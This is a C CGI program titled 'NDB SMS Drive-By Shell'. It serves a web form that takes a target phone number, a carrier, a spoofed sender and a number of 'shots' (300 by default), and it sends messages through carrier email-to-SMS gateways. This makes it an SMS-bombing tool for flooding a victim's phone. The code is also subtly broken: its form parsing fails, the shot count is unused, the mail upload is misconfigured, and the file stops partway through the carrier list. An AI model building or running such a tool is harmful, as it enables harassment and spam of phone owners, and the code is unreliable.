#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>

/* Function to parse POST data */
void parse_post_data(char *post_data, char *number, char *provider, char *shots, char *sender, char *subject, char *msg) {
    char *token = strtok(post_data, "&");
    while (token != NULL) {
        char *key = strtok(token, "=");
        char *value = strtok(NULL, "=");
        if (key && value) {
            if (strcmp(key, "number") == 0) strncpy(number, value, 255);
            else if (strcmp(key, "provider") == 0) strncpy(provider, value, 255);
            else if (strcmp(key, "shots") == 0) strncpy(shots, value, 255);
            else if (strcmp(key, "sender") == 0) strncpy(sender, value, 255);
            else if (strcmp(key, "subject") == 0) strncpy(subject, value, 255);
            else if (strcmp(key, "msg") == 0) strncpy(msg, value, 255);
        }
        token = strtok(NULL, "&");
    }
}

/* Function to send email using libcurl */
int send_email(const char *to, const char *from, const char *subject, const char *msg, const char *provider) {
    CURL *curl;
    CURLcode res = CURLE_OK;
    struct curl_slist *recipients = NULL;
    char reply_to[512];
    snprintf(reply_to, sizeof(reply_to), "nobody@%s", provider);

    curl = curl_easy_init();
    if (curl) {
        /* Set SMTP server (replace with your SMTP server details) */
        curl_easy_setopt(curl, CURLOPT_URL, "smtp://smtp.example.com:587");
        curl_easy_setopt(curl, CURLOPT_USERNAME, "your_smtp_username");
        curl_easy_setopt(curl, CURLOPT_PASSWORD, "your_smtp_password");
        curl_easy_setopt(curl, CURLOPT_MAIL_FROM, from);
        recipients = curl_slist_append(recipients, to);
        curl_easy_setopt(curl, CURLOPT_MAIL_RCPT, recipients);
        curl_easy_setopt(curl, CURLOPT_USE_SSL, CURLUSESSL_ALL);

        /* Set email headers and body */
        char email_data[1024];
        snprintf(email_data, sizeof(email_data),
                 "From: %s\r\nTo: %s\r\nReply-To: %s\r\nSubject: %s\r\n\r\n%s\r\n",
                 from, to, reply_to, subject, msg);
        curl_easy_setopt(curl, CURLOPT_READFUNCTION, NULL);
        curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);
        curl_easy_setopt(curl, CURLOPT_READDATA, email_data);
        curl_easy_setopt(curl, CURLOPT_INFILESIZE, (long)strlen(email_data));

        /* Send the email */
        res = curl_easy_perform(curl);
        if (res != CURLE_OK) {
            fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
        }

        curl_slist_free_all(recipients);
        curl_easy_cleanup(curl);
    }
    return res == CURLE_OK ? 0 : 1;
}

/* Function to output the HTML form */
void print_html_form() {
    printf("Content-Type: text/html\r\n\r\n");
    printf("<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n");
    printf("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n");
    printf("<head>\n");
    printf("<SCRIPT language=Javascript>\n");
    printf("<!--\n");
    printf("function isNumberKey(evt)\n");
    printf("{\n");
    printf("   var charCode = (evt.which) ? evt.which : event.keyCode\n");
    printf("   if (charCode > 31 && (charCode < 48 || charCode > 57))\n");
    printf("      return false;\n");
    printf("   return true;\n");
    printf("}\n");
    printf("eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('3(7.X){7[\"R\"+a]=a;7[\"z\"+a]=6(){7[\"R\"+a](7.1k)};7.X(\"1e\",7[\"z\"+a])}E{7.19(\"z\",a,15)}2 j=H V();6 a(){2 e=q.1d(\"1a\");3(e){o(e,\"P\");2 N=B(q,\"*\",\"14\");3((e.12<=10)||(N==\"\")){c(e,\"P\",d)}}4=B(q,\"*\",\"1n\");k(i=0;i<4.b;i++){3(4[i].F==\"1g\"||4[i].F==\"1f\"||4[i].F==\"1c\"){4[i].1b=6(){r();c(v.5.5,\"f\",d)};4[i].O=6(){r();c(v.5.5,\"f\",d)};j.D(j.b,0,4[i])}E{4[i].O=6(){r();c(v.5.5,\"f\",d)};4[i].18=6(){o(v.5.5,\"f\")}}}2 C=17.16.13();2 A=q.M(\"11\");3(C.K(\"J\")+1){c(A[0],\"J\",d)}3(C.K(\"I\")+1){c(A[0],\"I\",d)}}6 r(){k(2 i=0;i<j.b;i++){o(j[i].5.5,\"f\")}}6 B(m,y,w){2 x=(y==\"*\"&&m.Y)?m.Y:m.M(y);2 G=H V();w=w.1m(/\\\\-/g,\"\\\\\\\\-\");2 L=H 1l(\"(^|\\\\s)"+w+"(\\\\s|$)\");2 n;k(2 i=0;i<x.b;i++){n=x[i];3(L.1j(n.8)){G.1i(n)}}1h(G)}6 o(p,T){3(p.8){2 h=p.8.Z(\" \");2 U=T.t();k(2 i=0;i<h.b;i++){3(h[i].t()==U){h.D(i,1);i--}}p.8=h.S(\" \")}}6 c(l,u,Q){3(l.8){2 9=l.8.Z(\" \");3(Q){2 W=u.t();k(2 i=0;i<9.b;i++){3(9[i].t()==W){9.D(i,1);i--}}}9[9.b]=u;l.8=9.S(\" \")}E{l.8=u}}',62,86,'||var|if|elements|parentNode|function|window|className|_16|initialize|length|addClassName|true|_1|highlighted||_10||el_array|for|_13|_6|_c|removeClassName|_e|document|safari_reset||toUpperCase|_14|this|_8|_9|_7|load|_4|getElementsByClassName|_3|splice|else|type|_a|new|firefox|safari|indexOf|_b|getElementsByTagName|_2|onfocus|no_guidelines|_15|event_load|join|_f|_11|body|offsetWidth|toLowerCase|guidelines|false|userAgent|navigator|onblur|addEventListener|main_body|onclick|file|getElementById|onload|radio|checkbox|return|push|test|event|RegExp|replace|element'.split('|'),0,{}))\n");
    printf("//-->\n");
    printf("</SCRIPT>\n");
    printf("<style type=\"text/css\">\n");
    printf("body\n{\n");
    printf("    background:#ffffff;\n");
    printf("    font-family:\"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\n");
    printf("    font-size:small;\n");
    printf("    margin:8px 0 16px;\n");
    printf("    text-align:center;\n}\n");
    printf("#form_container\n{\n");
    printf("    background:#fff;\n");
    printf("    border:1px solid #ccc;\n");
    printf("    margin:0 auto;\n");
    printf("    text-align:left;\n");
    printf("    width:640px;\n}\n");
    printf("#top\n{\n");
    printf("    display:block;\n");
    printf("    height:10px;\n");
    printf("    margin:10px auto 0;\n");
    printf("    width:650px;\n}\n");
    printf("#footer\n{\n");
    printf("    width:640px;\n");
    printf("    clear:both;\n");
    printf("    color:#999999;\n");
    printf("    text-align:center;\n");
    printf("    width:640px;\n");
    printf("    padding-bottom: 15px;\n");
    printf("    font-size: 85%%;\n}\n");
    printf("#footer a{\n");
    printf("    color:#999999;\n");
    printf("    text-decoration: none;\n");
    printf("    border-bottom: 1px dotted #999999;\n}\n");
    printf("#bottom\n{\n");
    printf("    display:block;\n");
    printf("    height:10px;\n");
    printf("    margin:0 auto;\n");
    printf("    width:650px;\n}\n");
    printf("form.appnitro\n{\n");
    printf("    margin:20px 20px 0;\n");
    printf("    padding:0 0 20px;\n}\n");
    printf("/**** Logo Section  *****/\n");
    printf("h1\n{\n");
    printf("    background-color:#dedede;\n");
    printf("    margin:0;\n");
    printf("    min-height:0;\n");
    printf("    padding:0;\n");
    printf("    text-decoration:none;\n");
    printf("    text-indent:-8000px;\n}\n");
    printf("h1 a\n{\n");
    printf("    display:block;\n");
    printf("    height:100%%;\n");
    printf("    min-height:40px;\n");
    printf("    overflow:hidden;\n}\n");
    printf("img\n{\n");
    printf("    behavior:url(css/iepngfix.htc);\n");
    printf("    border:none;\n}\n");
    printf("/**** Form Section ****/\n");
    printf(".appnitro\n{\n");
    printf("    font-family:Lucida Grande, Tahoma, Arial, Verdana, sans-serif;\n");
    printf("    font-size:small;\n}\n");
    printf(".appnitro li\n{\n");
    printf("    width:61%%;\n}\n");
    printf("form ul\n{\n");
    printf("    font-size:100%%;\n");
    printf("    list-style-type:none;\n");
    printf("    margin:0;\n");
    printf("    padding:0;\n");
    printf("    width:100%%;\n}\n");
    printf("form li\n{\n");
    printf("    display:block;\n");
    printf("    margin:0;\n");
    printf("    padding:4px 5px 2px 9px;\n");
    printf("    position:relative;\n}\n");
    printf("form li:after\n{\n");
    printf("    clear:both;\n");
    printf("    content:\".\";\n0A    display:block;\n");
    printf("    height:0;\n");
    printf("    visibility:hidden;\n}\n");
    printf(".buttons:after\n{\n");
    printf("    clear:both;\n");
    printf("    content:\".\";\n");
    printf("    display:block;\n");
    printf("    height:0;\n");
    printf("    visibility:hidden;\n}\n");
    printf(".buttons\n{\n");
    printf("    clear:both;\n");
    printf("    display:block;\n");
    printf("    margin-top:10px;\n}\n");
    printf("* html form li\n{\n");
    printf("    height:1%%;\n}\n");
    printf("* html .buttons\n{\n");
    printf("    height:1%%;\n}\n");
    printf("* html form li div\n{\n");
    printf("    display:inline-block;\n}\n");
    printf("form li div\n{\n");
    printf("    color:#444;\n");
    printf("    margin:0 4px 0 0;\n");
    printf("    padding:0 0 8px;\n}\n");
    printf("form li span\n{\n");
    printf("    color:#444;\n");
    printf("    float:left;\n");
    printf("    margin:0 4px 0 0;\n");
    printf("    padding:0 0 8px;\n}\n");
    printf("form li div.left\n{\n");
    printf("    display:inline;\n");
    printf("    float:left;\n");
    printf("    width:48%%;\n}\n");
    printf("form li div.right\n{\n");
    printf("    display:inline;\n");
    printf("    float:right;\n");
    printf("    width:48%%;\n}\n");
    printf("form li div.left .medium\n{\n");
    printf("    width:100%%;\n}\n");
    printf("form li div.right .medium\n{\n");
    printf("    width:100%%;\n}\n");
    printf(".clear\n{\n");
    printf("    clear:both;\n}\n");
    printf("form li div label\n{\n");
    printf("    clear:both;\n");
    printf("    color:#444;\n");
    printf("    display:block;\n");
    printf("    font-size:9px;\n");
    printf("    line-height:9px;\n");
    printf("    margin:0;\n");
    printf("    padding-top:3px;\n}\n");
    printf("form li span label\n{\n");
    printf("    clear:both;\n");
    printf("    color:#444;\n");
    printf("    display:block;\n");
    printf("    font-size:9px;\n");
    printf("    line-height:9px;\n");
    printf("    margin:0;\n");
    printf("    padding-top:3px;\n}\n");
    printf("form li .datepicker\n{\n");
    printf("    cursor:pointer !important;\n");
    printf("    float:left;\n");
    printf("    height:16px;\n");
    printf("    margin:.1em 5px 0 0;\n");
    printf("    padding:0;\n");
    printf("    width:16px;\n}\n");
    printf(".form_description\n{\n");
    printf("    border-bottom:1px dotted #ccc;\n");
    printf("    clear:both;\n");
    printf("    display:inline-block;\n");
    printf("    margin:0 0 1em;\n}\n");
    printf(".form_description[class]\n{\n");
    printf("    display:block;\n}\n");
    printf(".form_description h2\n{\n");
    printf("    clear:left;\n");
    printf("    font-size:160%%;\n");
    printf("    font-weight:400;\n");
    printf("    margin:0 0 3px;\n}\n");
    printf(".form_description p\n{\n");
    printf("    font-size:95%%;\n");
    printf("    line-height:130%%;\n");
    printf("    margin:0 0 12px;\n}\n");
    printf("form hr\n{\n");
    printf("    display:none;\n}\n");
    printf("form li.section_break\n{\n");
    printf("    border-top:1px dotted #ccc;\n");
    printf("    margin-top:9px;\n");
    printf("    padding-bottom:0;\n");
    printf("    padding-left:9px;\n");
    printf("    padding-top:13px;\n");
    printf("    width:97%% !important;\n}\n");
    printf("form ul li.first\n{\n");
    printf("    border-top:none !important;\n");
    printf("    margin-top:0 !important;\n");
    printf("    padding-top:0 !important;\n}\n");
    printf("form .section_break h3\n{\n");
    printf("    font-size:110%%;\n");
    printf("    font-weight:400;\n");
    printf("    line-height:130%%;\n");
    printf("    margin:0 0 2px;\n}\n");
    printf("form .section_break p\n{\n");
    printf("    font-size:85%%;\n");
    printf("    margin:0 0 10px;\n}\n");
    printf("/**** Buttons ****/\n");
    printf("input.button_text\n{\n");
    printf("    overflow:visible;\n");
    printf("    padding:0 7px;\n");
    printf("    width:auto;\n}\n");
    printf(".buttons input\n{\n");
    printf("    font-size:120%%;\n");
    printf("    margin-right:5px;\n}\n");
    printf("/**** Inputs and Labels ****/\n");
    printf("label.description\n{\n");
    printf("    border:none;\n");
    printf("    color:#222;\n");
    printf("    display:block;\n");
    printf("    font-size:95%%;\n");
    printf("    font-weight:700;\n");
    printf("    line-height:150%%;\n");
    printf("    padding:0 0 1px;\n}\n");
    printf("span.symbol\n{\n");
    printf("    font-size:115%%;\n");
    printf("    line-height:130%%;\n}\n");
    printf("input.text\n{\n");
    printf("    background:#fff;\n");
    printf("    border-bottom:1px solid #ddd;\n");
    printf("    border-left:1px solid #c3c3c3;\n");
    printf("    border-right:1px solid #c3c3c3;\n");
    printf("    border-top:1px solid #7c7c7c;\n");
    printf("    color:#333;\n");
    printf("    font-size:100%%;\n");
    printf("    margin:0;\n");
    printf("    padding:2px 0;\n}\n");
    printf("input.file\n{\n");
    printf("    color:#333;\n");
    printf("    font-size:100%%;\n");
    printf("    margin:0;\n");
    printf("    padding:2px 0;\n}\n");
    printf("textarea.textarea\n{\n");
    printf("    background:#fff;\n");
    printf("    border-bottom:1px solid #ddd;\n");
    printf("    border-left:1px solid #c3c3c3;\n");
    printf("    border-right:1px solid #c3c3c3;\n");
    printf("    border-top:1px solid #7c7c7c;\n");
    printf("    color:#333;\n");
    printf("    font-family:\"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\n");
    printf("    font-size:100%%;\n");
    printf("    margin:0;\n");
    printf("    width:99%%;\n}\n");
    printf("select.select\n{\n");
    printf("    color:#333;\n");
    printf("    font-size:100%%;\n");
    printf("    margin:1px 0;\n");
    printf("    padding:1px 0 0;\n");
    printf("    background:#fff repeat-x top;\n");
    printf("    border-bottom:1px solid #ddd;\n");
    printf("    border-left:1px solid #c3c3c3;\n");
    printf("    border-right:1px solid #c3c3c3;\n");
    printf("    border-top:1px solid #7c7c7c;\n}\n");
    printf("input.currency\n{\n");
    printf("    text-align:right;\n}\n");
    printf("input.checkbox\n{\n");
    printf("    display:block;\n");
    printf("    height:13px;\n");
    printf("    line-height:1.4em;\n");
    printf("    margin:6px 0 0 3px;\n");
    printf("    width:13px;\n}\n");
    printf("input.radio\n{\n");
    printf("    display:block;\n");
    printf("    height:13px;\n");
    printf("    line-height:1.4em;\n");
    printf("    margin:6px 0 0 3px;\n");
    printf("    width:13px;\n}\n");
    printf("label.choice\n{\n");
    printf("    color:#444;\n");
    printf("    display:block;\n");
    printf("    font-size:100%%;\n");
    printf("    line-height:1.4em;\n");
    printf("    margin:-1.55em 0 0 25px;\n");
    printf("    padding:4px 0 5px;\n");
    printf("    width:90%%;\n}\n");
    printf("select.select[class]\n{\n");
    printf("    margin:0;\n");
    printf("    padding:1px 0;\n}\n");
    printf("*:first-child+html select.select[class]\n{\n");
    printf("    margin:1px 0;\n}\n");
    printf(".safari select.select\n{\n");
    printf("    font-size:120%% !important;\n");
    printf("    margin-bottom:1px;\n}\n");
    printf("input.small\n{\n");
    printf("    width:25%%;\n}\n");
    printf("select.small\n{\n");
    printf("    width:25%%;\n}\n");
    printf("input.medium\n{\n");
    printf("    width:50%%;\n}\n");
    printf("select.medium\n{\n");
    printf("    width:50%%;\n}\n");
    printf("input.large\n{\n");
    printf("    width:99%%;\n}\n");
    printf("select.large\n{\n");
    printf("    width:100%%;\n}\n");
    printf("textarea.small\n{\n");
    printf("    height:5.5em;\n}\n");
    printf("textarea.medium\n{\n");
    printf("    height:10em;\n}\n");
    printf("textarea.large\n{\n");
    printf("    height:20em;\n}\n");
    printf("/**** Errors ****/\n");
    printf("#error_message\n{\n");
    printf("    background:#fff;\n");
    printf("    border:1px dotted red;\n");
    printf("    margin-bottom:1em;\n");
    printf("    padding-left:0;\n");
    printf("    padding-right:0;\n");
    printf("    padding-top:4px;\n");
    printf("    text-align:center;\n");
    printf("    width:99%%;\n}\n");
    printf("#error_message_title\n{\n");
    printf("    color:#DF0000;\n");
    printf("    font-size:125%%;\n");
    printf("    margin:7px 0 5px;\n");
    printf("    padding:0;\n}\n");
    printf("#error_message_desc\n{\n");
    printf("    color:#000;\n");
    printf("    font-size:100%%;\n");
    printf("    margin:0 0 .8em;\n}\n");
    printf("#error_message_desc strong\n{\n");
    printf("    background-color:#FFDFDF;\n");
    printf("    color:red;\n");
    printf("    padding:2px 3px;\n}\n");
    printf("form li.error\n{\n");
    printf("    background-color:#FFDFDF !important;\n");
    printf("    border-bottom:1px solid #EACBCC;\n");
    printf("    border-right:1px solid #EACBCC;\n");
    printf("    margin:3px 0;\n}\n");
    printf("form li.error label\n{\n");
    printf("    color:#DF0000 !important;\n}\n");
    printf("form p.error\n{\n");
    printf("    clear:both;\n");
    printf("    color:red;\n");
    printf("    font-size:10px;\n");
    printf("    font-weight:700;\n");
    printf("    margin:0 0 5px;\n}\n");
    printf("form .required\n{\n");
    printf("    color:red;\n");
    printf("    float:none;\n");
    printf("    font-weight:700;\n}\n");
    printf("/**** Guidelines and Error Highlight ****/\n");
    printf("form li.highlighted\n{\n");
    printf("    background-color:#fff7c0;\n}\n");
    printf("form .guidelines\n{\n");
    printf("    background:#f5f5f5;\n");
    printf("    border:1px solid #e6e6e6;\n");
    printf("    color:#444;\n");
    printf("    font-size:80%%;\n");
    printf("    left:100%%;\n");
    printf("    line-height:130%%;\n");
    printf("    margin:0 0 0 8px;\n");
    printf("    padding:8px 10px 9px;\n");
    printf("    position:absolute;\n");
    printf("    top:0;\n");
    printf("    visibility:hidden;\n");
    printf("    width:42%%;\n");
    printf("    z-index:1000;\n}\n");
    printf("form .guidelines small\n{\n");
    printf("    font-size:105%%;\n}\n");
    printf("form li.highlighted .guidelines\n{\n");
    printf("    visibility:visible;\n}\n");
    printf("form li:hover .guidelines\n{\n");
    printf("    visibility:visible;\n}\n");
    printf(".no_guidelines .guidelines\n{\n");
    printf("    display:none !important;\n}\n");
    printf(".no_guidelines li.section\n{\n");
    printf("    padding-left:9px;\n}\n");
    printf("/*** Success Message ****/\n");
    printf(".form_success \n{\n");
    printf("    clear: both;\n");
    printf("    margin: 0;\n");
    printf("    padding: 90px 0pt 100px;\n");
    printf("    text-align: center\n}\n");
    printf(".form_success h2 {\n");
    printf("    clear:left;\n");
    printf("    font-size:160%%;\n");
    printf("    font-weight:normal;\n");
    printf("    margin:0pt 0pt 3px;\n}\n");
    printf("/*** Password ****/\n");
    printf("ul.password{\n");
    printf("    margin-top:60px;\n");
    printf("    margin-bottom: 60px;\n");
    printf("    text-align: center;\n}\n");
    printf(".password h2{\n");
    printf("    color:#DF0000;\n");
    printf("    font-weight:bold;\n");
    printf("    margin:0pt auto 10px;\n}\n");
    printf(".password input.text {\n");
    printf("    font-size:170%% !important;\n");
    printf("    width:380px;\n");
    printf("    text-align: center;\n}\n");
    printf(".password label{\n");
    printf("    display:block;\n");
    printf("    font-size:120%% !important;\n");
    printf("    padding-top:10px;\n");
    printf("    font-weight:bold;\n}\n");
    printf("#li_captcha{\n");
    printf("    padding-left: 5px;\n}\n");
    printf("#li_captcha span{\n");
    printf("    float:none;\n}\n");
    printf("/** Embedded Form **/\n");
    printf(".embed #form_container{\n");
    printf("    border: none;\n}\n");
    printf(".embed #top, .embed #bottom, .embed h1{\n");
    printf("    display: none;\n}\n");
    printf(".embed #form_container{\n");
    printf("    width: 100%%;\n}\n");
    printf(".embed #footer{\n");
    printf("    text-align: left;\n");
    printf("    padding-left: 10px;\n");
    printf("    width: 99%%;\n}\n");
    printf(".embed #footer.success{\n");
    printf("    text-align: center;\n}\n");
    printf(".embed form.appnitro\n{\n");
    printf("    margin:0px 0px 0;\n}\n");
    printf("/*** Calendar **********************/\n");
    printf("div.calendar { position: relative; }\n");
    printf(".calendar table {\n");
    printf("cursor:pointer;\n");
    printf("border:1px solid #ccc;\n");
    printf("font-size: 11px;\n");
    printf("color: #000;\n");
    printf("background: #fff;\n");
    printf("font-family:\"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\n}\n");
    printf(".calendar .button { \n");
    printf("text-align: center;    \n");
    printf("padding: 2px;          \n}\n");
    printf(".calendar .nav {\n");
    printf("background:#f5f5f5;\n}\n");
    printf(".calendar thead .title { \n");
    printf("font-weight: bold;      \n");
    printf("text-align: center;\n");
    printf("background: #dedede;\n");
    printf("color: #000;\n");
    printf("padding: 2px 0 3px 0;\n}\n");
    printf(".calendar thead .headrow { \n");
    printf("background: #f5f5f5;\n");
    printf("color: #444;\n");
    printf("font-weight:bold;\n}\n");
    printf(".calendar thead .daynames { \n");
    printf("background: #fff;\n");
    printf("color:#333;\n");
    printf("font-weight:bold;\n}\n");
    printf(".calendar thead .name { \n");
    printf("border-bottom: 1px dotted #ccc;\n");
    printf("padding: 2px;\n");
    printf("text-align: center;\n");
    printf("color: #000;\n}\n");
    printf(".calendar thead .weekend { \n");
    printf("color: #666;\n}\n");
    printf(".calendar thead .hilite { \n");
    printf("background-color: #444;\n");
    printf("color: #fff;\n");
    printf("padding: 1px;\n}\n");
    printf(".calendar thead .active { \n");
    printf("background-color: #d12f19;\n");
    printf("color:#fff;\n");
    printf("padding: 2px 0px 0px 2px;\n}\n");
    printf(".calendar tbody .day { \n");
    printf("width:1.8em;\n");
    printf("color: #222;\n");
    printf("text-align: right;\n");
    printf("padding: 2px 2px 2px 2px;\n}\n");
    printf(".calendar tbody .day.othermonth {\n");
    printf("font-size: 80%%;\n");
    printf("color: #bbb;\n}\n");
    printf(".calendar tbody .day.othermonth.oweekend {\n");
    printf("color: #fbb;\n}\n");
    printf(".calendar table .wn {\n");
    printf("padding: 2px 2px 2px 2px;\n");
    printf("border-right: 1px solid #000;\n");
    printf("background: #666;\n}\n");
    printf(".calendar tbody .rowhilite td {\n");
    printf("background: #FFF1AF;\n}\n");
    printf(".calendar tbody .rowhilite td.wn {\n");
    printf("background: #FFF1AF;\n}\n");
    printf(".calendar tbody td.hilite { \n");
    printf("padding: 1px 1px 1px 1px;\n");
    printf("background:#444 !important;\n");
    printf("color:#fff !important;\n}\n");
    printf(".calendar tbody td.active { \n");
    printf("color:#fff;\n");
    printf("background: #529214 !important;\n");
    printf("padding: 2px 2px 0px 2px;\n}\n");
    printf(".calendar tbody td.selected { \n");
    printf("font-weight: bold;\n");
    printf("border: 1px solid #888;\n");
    printf("padding: 1px 1px 1px 1px;\n");
    printf("background: #f5f5f5 !important;\n");
    printf("color: #222 !important;\n}\n");
    printf(".calendar tbody td.weekend { \n");
    printf("color: #666;\n}\n");
    printf(".calendar tbody td.today { \n");
    printf("font-weight: bold;\n");
    printf("color: #529214;\n");
    printf("background:#D9EFC2;\n}\n");
    printf(".calendar tbody .disabled { color: #999; }\n");
    printf(".calendar tbody .emptycell { \n");
    printf("visibility: hidden;\n}\n");
    printf(".calendar tbody .emptyrow { \n");
    printf("display: none;\n}\n");
    printf(".calendar tfoot .footrow { \n");
    printf("text-align: center;\n");
    printf("background: #556;\n");
    printf("color: #fff;\n}\n");
    printf(".calendar tfoot .ttip { \n");
    printf("background: #222;\n");
    printf("color: #fff;\n");
    printf("font-size:10px;\n");
    printf("border-top: 1px solid #dedede;\n");
    printf("padding: 3px;\n}\n");
    printf(".calendar tfoot .hilite { \n");
    printf("background: #aaf;\n");
    printf("border: 1px solid #04f;\n");
    printf("color: #000;\n");
    printf("padding: 1px;\n}\n");
    printf(".calendar tfoot .active { \n");
    printf("background: #77c;\n");
    printf("padding: 2px 0px 0px 2px;\n}\n");
    printf(".calendar .combo {\n");
    printf("position: absolute;\n");
    printf("display: none;\n");
    printf("top: 0px;\n");
    printf("left: 0px;\n");
    printf("width: 4em;\n");
    printf("border: 1px solid #ccc;\n");
    printf("background: #f5f5f5;\n");
    printf("color: #222;\n");
    printf("font-size: 90%%;\n");
    printf("z-index: 100;\n}\n");
    printf(".calendar .combo .label,\n");
    printf(".calendar .combo .label-IEfix {\n");
    printf("text-align: center;\n");
    printf("padding: 1px;\n}\n");
    printf(".calendar .combo .label-IEfix {\n");
    printf("width: 4em;\n}\n");
    printf(".calendar .combo .hilite {\n");
    printf("background: #444;\n");
    printf("color:#fff;\n}\n");
    printf(".calendar .combo .active {\n");
    printf("border-top: 1px solid #999;\n");
    printf("border-bottom: 1px solid #999;\n");
    printf("background: #dedede;\n");
    printf("font-weight: bold;\n}\n");
    printf("</style>\n");
    printf("<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n");
    printf("<title>NDB SMS Drive-By Shell</title>\n");
    printf("</head>\n");
    printf("<body id=\"main_body\" >\n");
    printf("    <div id=\"form_container\">\n");
    printf("        <form id=\"form_222378\" class=\"appnitro\" method=\"post\" action=\"\">\n");
    printf("            <div class=\"form_description\">\n");
    printf("                <h2>NDB SMS Drive-by Shell</h2>\n");
    printf("                <p>Pew Pew Pew Pew</p>\n");
    printf("            </div>\n");
    printf("            <ul >\n");
    printf("                <li id=\"li_2\" >\n");
    printf("                    <label class=\"description\" for=\"shots\">Shots </label>\n");
    printf("                    <div>\n");
    printf("                        <input id=\"element_2\" name=\"shots\" class=\"element text small\" type=\"text\" maxlength=\"255\" value=\"300\" onkeypress=\"return isNumberKey(event)\"/>\n");
    printf("                    </div>\n");
    printf("                </li>\n");
    printf("                <li id=\"li_5\" >\n");
    printf("                    <label class=\"description\" for=\"number\">Phone Number </label>\n");
    printf("                    <div>\n");
    printf("                        <input id=\"element_1\" name=\"number\" class=\"element text small\" type=\"text\" maxlength=\"10\" value=\"\" onkeypress=\"return isNumberKey(event)\"/>\n");
    printf("                        <select class=\"element select medium\" id=\"element_5\" name=\"provider\">\n");
    printf("                            <option value=\"@sms.3rivers.net\">3 River Wireless</option>\n");
    printf("                            <option value=\"@paging.acswireless.com\">ACS Wireless</option>\n");
    printf("                            <option value=\"@message.alltel.com\">Alltel</option>\n");
    printf("                            <option value=\"@txt.att.net\">AT&amp;T</option>\n");
    printf("                            <option value=\"@txt.bellmobility.ca\">Bell Canada</option>\n");
    printf("                            <option value=\"@bellmobility.ca\">Bell Canada</option>\n");
    printf("                            <option value=\"@txt.bell.ca\">Bell Mobility (Canada)</option>\n");
    printf("                            <option value=\"@txt.bellmobility.ca\">Bell Mobility</option>\n");
    printf("                            <option value=\"@blueskyfrog.com\">Blue Sky Frog</option>\n");
    printf("                            <option value=\"@sms.bluecell.com\">Bluegrass Cellular</option>\n");
    printf("                            <option value=\"@myboostmobile.com\">Boost Mobile</option>\n");
    printf("                            <option value=\"@bplmobile.com\">BPL Mobile</option>\n");
    printf("                            <option value=\"@cwwsms.com\">Carolina West Wireless</option>\n");
    printf("                            <option value=\"@mobile.celloneusa.com\">Cellular One</option>\n");
    printf("                            <option value=\"@csouth1.com\">Cellular South</option>\n");
    printf("                            <option value=\"@cwemail.com\">Centennial Wireless</option>\n");
    printf("                            <option value=\"@messaging.centurytel.net\">CenturyTel</option>\n");
    printf("                            <option value=\"@txt.att.net\">Cingular (Now AT&T)</option>\n");
    printf("                            <option value=\"@msg.clearnet.com\">Clearnet</option>\n");
    printf("                            <option value=\"@comcastpcs.textmsg.com\">Comcast</option>\n");
    printf("                            <option value=\"@corrwireless.net\">Corr Wireless Communications</option>\n");
    printf("                            <option value=\"@mobile.dobson.net\">Dobson</option>\n");
    printf("                            <option value=\"@sms.edgewireless.com\">Edge Wireless</option>\n");
    printf("                            <option value=\"@fido.ca\">Fido</option>\n");
    printf("                            <option value=\"@sms.goldentele.com\">Golden Telecom</option>\n");
    printf("                            <option value=\"@txt.voice.google.com\">Google Voice</option>\n");
    printf("                            <option value=\"@messaging.sprintpcs.com\">Helio</option>\n");
    printf("                            <option value=\"@text.houstoncellular.net\">Houston Cellular</option>\n");
    printf("                            <option value=\"@ideacellular.net\">Idea Cellular</option>\n");
    printf("                            <option value=\"@ivctext.com\">Illinois Valley Cellular</option>\n");
    printf("                            <option value=\"@inlandlink.com\">Inland Cellular Telephone</option>\n");
    printf("                            <option value=\"@pagemci.com\">MCI</option>\n");
    printf("                            <option value=\"@page.metrocall.com\">Metrocall</option>\n");
    printf("                            <option value=\"@my2way.com\">Metrocall 2-way</option>\n");
    printf("                            <option value=\"@mymetropcs.com\">Metro PCS</option>\n");
    printf("                            <option value=\"@fido.ca\">Microcell</option>\n");
    printf("                            <option value=\"@clearlydigital.com\">Midwest Wireless</option>\n");
    printf("                            <option value=\"@mobilecomm.net\">Mobilcomm</option>\n");
    printf("                            <option value=\"@text.mtsmobility.com\">MTS</option>\n");
    printf("                            <option value=\"@messaging.nextel.com\">Nextel</option>\n");
    printf("                            <option value=\"@onlinebeep.net\">OnlineBeep</option>\n");
    printf("                            <option value=\"@pcsone.net\">PCS One</option>\n");
    printf("                            <option value=\"@txt.bell.ca\">Presidents Choice</option>\n");
    printf("                            <option value=\"@sms.pscel.com\">Public Service Cellular</option>\n");
    printf("                            <option value=\"@qwestmp.com\">Qwest</option>\n");
    printf("                            <option value=\"@pcs.rogers.com\">Rogers AT&T Wireless</option>\n");
    printf("                            <option value=\"@pcs.rogers.com\">Rogers Canada</option>\n");
    printf("                            <option value=\"@pageme@satellink.net\">Satellink</option>\n");
    printf("                            <option value=\"@email.swbw.com\">Southwestern Bell</option>\n");
    printf("                            <option value=\"@messaging.sprintpcs.com\">Sprint</option>\n");
    printf("                            <option value=\"@tms.suncom.com\">Sumcom</option>\n");
    printf("                            <option value=\"@mobile.surewest.com\">Surewest Communicaitons</option>\n");
    printf("                            <option value=\"@tmomail.net\">T-Mobile</option>\n");
    printf("                            <option value=\"@msg.telus.com\">Telus</option>\n");
    printf("                            <option value=\"@txt.att.net\">Tracfone</option>\n");
    printf("                            <option value=\"@tms.suncom.com\">Triton</option>\n");
    printf("                            <option value=\"@utext.com\">Unicel</option>\n");
    printf("                            <option value=\"@email.uscc.net\">US Cellular</option>\n");
    printf("                            <option value=\"@txt.bell.ca\">Solo Mobile</option>\n");
